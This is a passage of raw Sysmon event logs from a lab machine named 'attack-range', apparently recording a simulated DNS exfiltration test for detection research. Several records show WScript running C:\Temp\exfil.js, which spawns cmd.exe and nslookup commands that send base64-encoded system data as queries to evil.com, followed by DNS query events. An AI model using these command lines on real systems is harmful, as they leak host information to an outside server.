.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.866{2E1864BB-17CE-629A-2D42-000000005F02}4640C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpdxqj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 22542200x8000000000000000204712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.001{00000000-0000-0000-0000-000000000000}6404evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.939{00000000-0000-0000-0000-000000000000}4204evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.869{00000000-0000-0000-0000-000000000000}5584evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.801{00000000-0000-0000-0000-000000000000}7476evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.738{00000000-0000-0000-0000-000000000000}1492evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.665{00000000-0000-0000-0000-000000000000}7836evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.598{00000000-0000-0000-0000-000000000000}6244evil.com0::ffff:127.0.0.1;<unknown process> 23542300x8000000000000000204705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.862{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhyqod.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000204704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.513{00000000-0000-0000-0000-000000000000}4784evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.422{00000000-0000-0000-0000-000000000000}2672evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.336{00000000-0000-0000-0000-000000000000}7736evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.241{00000000-0000-0000-0000-000000000000}8124evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.118{00000000-0000-0000-0000-000000000000}5332evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.980{00000000-0000-0000-0000-000000000000}3848evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.838{00000000-0000-0000-0000-000000000000}2736evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.697{00000000-0000-0000-0000-000000000000}216evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.560{00000000-0000-0000-0000-000000000000}5408evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000204695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.443{00000000-0000-0000-0000-000000000000}2388evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000204694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.826{2E1864BB-17CE-629A-2B42-000000005F02}74287864C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-2C42-000000005F02}1648C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.826{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.826{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.826{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.826{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.826{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-2C42-000000005F02}1648C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.826{2E1864BB-17CE-629A-2A42-000000005F02}58607508C:\Windows\system32\cmd.exe{2E1864BB-17CE-629A-2C42-000000005F02}1648C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.827{2E1864BB-17CE-629A-2C42-000000005F02}1648C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CE-629A-2A42-000000005F02}5860C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhyqod.tmp 2>&1 10341000x8000000000000000204686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.795{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-2B42-000000005F02}7428C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.795{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-2B42-000000005F02}7428C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.795{2E1864BB-17CE-629A-2B42-000000005F02}74287864C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-2A42-000000005F02}5860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.779{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-2B42-000000005F02}7428C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.779{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.779{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.779{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.779{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.779{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-2A42-000000005F02}5860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.779{2E1864BB-17A1-629A-783D-000000005F02}55526052C:\Windows\System32\WScript.exe{2E1864BB-17CE-629A-2A42-000000005F02}5860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.785{2E1864BB-17CE-629A-2A42-000000005F02}5860C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhyqod.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.779{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvgkcv.tmpMD5=5DEA0472F77A6BF3961D4B745AA161B8,SHA256=60802D61581927EFE9566582D9B1AC54D5861CAF9DA1F25F5EA80365318A8915,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.757{2E1864BB-17CE-629A-2842-000000005F02}47808104C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-2942-000000005F02}2192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.742{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.742{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.742{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.742{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\S